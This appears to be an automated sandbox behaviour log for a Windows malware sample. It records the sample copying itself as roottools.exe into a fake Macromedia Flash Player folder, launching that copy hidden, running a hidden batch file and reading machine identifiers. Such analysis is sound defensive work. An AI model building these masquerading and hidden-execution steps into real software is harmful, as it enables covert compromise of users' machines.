Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x7639fbf5 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7638a1b9 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x7637fcca True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x7637ff07 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x76385c62 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x7639c6fb True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x763ace21 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x75ad13f0 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x75afe599 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x75b209ad True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75af5ea5 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75b286d3 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76965689 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76964de0 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7696e743 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x769654f4 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76964f70 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76965f49 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76965ea6 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x769658b3 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x75f449e9 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75f3b406 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x75f3a33e True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75f31b56 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75f44c7d True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x75f2d075 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x75f375e8 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75f4f18e True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75f3ab49 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x75fb18f8 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x76690000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x766c1d76 True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x761b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x761b3eae True 1
Fn
Module Load module_name = Secur32.dll, base_address = 0x75690000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 True 1
Fn
Module Get Handle module_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, base_address = 0x400000 True 1
Fn
System Get Computer Name result_out = YKYD69Q True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId False 1
Fn
System Get Info type = Operating System True 3
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlDosPathNameToNtPathName_U, address_out = 0x77d0ce41 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateFile, address_out = 0x77cd00a4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtClose, address_out = 0x77ccf9d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryEaFile, address_out = 0x77cd1314 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtSetEaFile, address_out = 0x77cd19b0 True 1
Fn
File Create filename = \??\C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, desired_access = FILE_READ_EA, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Get Info filename = \??\C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, type = extended False 1
Fn
Mutex Create mutex_name = 9B4D68961731FE3C22DA08B640799EB6 True 1
Fn
Mutex Open mutex_name = E58EFF540968A436E982FCFA1C0445A2, desired_access = SYNCHRONIZE True 1
Fn
File Create filename = \\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89, desired_access = GENERIC_WRITE, GENERIC_READ True 1
Fn
File Write filename = \\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89, size = 4 True 1
Fn
Data
File Read filename = \\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89, size = 4, size_out = 4 True 1
Fn
Data
File Read filename = \\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89, size = 766, size_out = 766 True 1
Fn
Data
File Create filename = \\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89, desired_access = GENERIC_WRITE, GENERIC_READ True 1
Fn
File Write filename = \\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89, size = 4 True 1
Fn
Data
File Read filename = \\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89, size = 4, size_out = 4 True 2
Fn
Data
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, type = size, size_out = 196608 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, size = 196608, size_out = 196608 True 1
Fn
Data
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 196608 True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 True 1
Fn
File Create filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = FILE_WRITE_EA, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming, type = time True 1
Fn
System Get Time type = System Time, time = 2018-01-10 18:56:58 (UTC) True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
Process Create process_name = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", os_pid = 0x7e8, creation_flags = CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
Mutex Release mutex_name = 9B4D68961731FE3C22DA08B640799EB6 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, size = 216 True 1
Fn
Data
Environment Get Environment String name = ComSpec, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Process Create process_name = "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat", os_pid = 0x6a4, creation_flags = CREATE_DEFAULT_ERROR_MODE, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Process #22: roottools.exe
(Host: 673, Network: 0)
+
Information Value
ID #22
File Name c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe
Command Line "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe"
Initial Working Directory C:\Users\aETAdzjz\AppData\Roaming\
Monitor Start Time: 00:05:28, Reason: Child Process
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:04:45
OS Process Information
+
Information Value
PID 0x7e8
Parent PID 0x594 (c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 7B4
0x 6A8
0x 114
0x 718
0x 7B0
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False
private_0x0000000000210000 0x00210000 0x0025ffff Private Memory Readable, Writable True False False
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000220000 0x00220000 0x00226fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000230000 0x00230000 0x00231fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000240000 0x00240000 0x00247fff Private Memory Readable, Writable True False False
private_0x0000000000250000 0x00250000 0x0025ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000260000 0x00260000 0x00260fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000280000 0x00280000 0x002fffff Private Memory Readable, Writable True False False
private_0x0000000000300000 0x00300000 0x003affff Private Memory Readable, Writable True False False
private_0x0000000000300000 0x00300000 0x0033ffff Private Memory Readable, Writable True False False
private_0x0000000000370000 0x00370000 0x003affff Private Memory Readable, Writable True False False
rsaenh.dll 0x003b0000 0x003ebfff Memory Mapped File Readable False False False
roottools.exe 0x00400000 0x00432fff Memory Mapped File Readable, Writable, Executable True False False
private_0x0000000000400000 0x00400000 0x0041bfff Private Memory Readable, Writable, Executable True False False
private_0x0000000000420000 0x00420000 0x0045ffff Private Memory Readable, Writable True False False
private_0x0000000000440000 0x00440000 0x004effff Private Memory Readable, Writable True False False
private_0x0000000000460000 0x00460000 0x0049ffff Private Memory Readable, Writable True False False
private_0x00000000004b0000 0x004b0000 0x004effff Private Memory Readable, Writable True False False
private_0x0000000000520000 0x00520000 0x0061ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000620000 0x00620000 0x006fefff Pagefile Backed Memory Readable True False False
private_0x0000000000770000 0x00770000 0x0077ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000780000 0x00780000 0x00907fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000910000 0x00910000 0x00a90fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000aa0000 0x00aa0000 0x01e9ffff Pagefile Backed Memory Readable True False False
private_0x0000000001ea0000 0x01ea0000 0x0229ffff Private Memory Readable, Writable True False False
sortdefault.nls 0x022a0000 0x0256efff Memory Mapped File Readable False False False
private_0x0000000002570000 0x02570000 0x0278ffff Private Memory Readable, Writable True False False
private_0x0000000002570000 0x02570000 0x026fffff Private Memory Readable, Writable True False False
private_0x0000000002570000 0x02570000 0x025effff Private Memory Readable, Writable True False False
private_0x00000000025f0000 0x025f0000 0x026effff Private Memory Readable, Writable True False False
private_0x00000000026f0000 0x026f0000 0x026fffff Private Memory Readable, Writable True False False
private_0x0000000002750000 0x02750000 0x0278ffff Private Memory Readable, Writable True False False
pagefile_0x0000000002790000 0x02790000 0x02b82fff Pagefile Backed Memory Readable True False False
staticcache.dat 0x02b90000 0x034bffff Memory Mapped File Readable False False False
private_0x00000000034c0000 0x034c0000 0x0364ffff Private Memory Readable, Writable True False False
private_0x00000000034c0000 0x034c0000 0x035dffff Private Memory Readable, Writable True False False
private_0x0000000003610000 0x03610000 0x0364ffff Private Memory Readable, Writable True False False
private_0x0000000003650000 0x03650000 0x0b64ffff Private Memory Readable, Writable, Executable True False False
private_0x000000000b750000 0x0b750000 0x0b84ffff Private Memory Readable, Writable True False False
private_0x000000000b850000 0x0b850000 0x0b94ffff Private Memory Readable, Writable True False False
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False
dwmapi.dll 0x74130000 0x74142fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x741b0000 0x7422ffff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x743d0000 0x743d7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x743e0000 0x7443bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74440000 0x7447efff Memory Mapped File Readable, Writable, Executable False False False
sxs.dll 0x74e30000 0x74e8efff Memory Mapped File Readable, Writable, Executable False False False
dhcpcsvc.dll 0x74fd0000 0x74fe1fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x75630000 0x7566afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x75670000 0x75685fff Memory Mapped File Readable, Writable, Executable False False False
secur32.dll 0x75690000 0x75697fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x756b0000 0x756cbfff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x756e0000 0x756e6fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75800000 0x7580bfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75810000 0x7586ffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x758c0000 0x759bffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759c0000 0x75acffff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x75ad0000 0x75ad4fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75ae0000 0x75c3bfff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x75c40000 0x75e3afff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x75e70000 0x75f1bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75f20000 0x76014fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x760b0000 0x7610ffff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76110000 0x761acfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x761b0000 0x7623efff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x76240000 0x7635cfff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x76360000 0x7636bfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76370000 0x763c6fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76570000 0x7663bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x76640000 0x76685fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76690000 0x767c5fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x767d0000 0x767e8fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x767f0000 0x767f5fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76800000 0x768effff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x768f0000 0x768f9fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76950000 0x769dffff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x76a70000 0x776b9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x777e0000 0x77814fff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000778b0000 0x778b0000 0x779a9fff Private Memory Readable, Writable, Executable True False False
private_0x00000000779b0000 0x779b0000 0x77acefff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77ad0000 0x77c78fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77cb0000 0x77e2ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Threads
Thread 0x7b4
(Host: 636, Network: 0)
+
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 False 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x759d5235 True 1
Fn
Mutex Create - True 1
Fn
Module Get Handle module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, base_address = 0x400000 True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
Module Get Filename module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = OLEAUT32.DLL, base_address = 0x761b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x762170a1 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x761b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x761c3dcf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x761c07b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x761e1ca9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x761c8e70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x761c7684 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x761ccc98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x761f903a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x761c6231 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x761c5fea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x761d3f94 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x761d4e9e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x761fdb72 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x761e2a8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x761fd737 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x761fe015 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x761fcc3d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x761fd1c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x761fd48c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x761fd4c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x761fd509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x761ce7bb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x761ce496 True 1
Fn
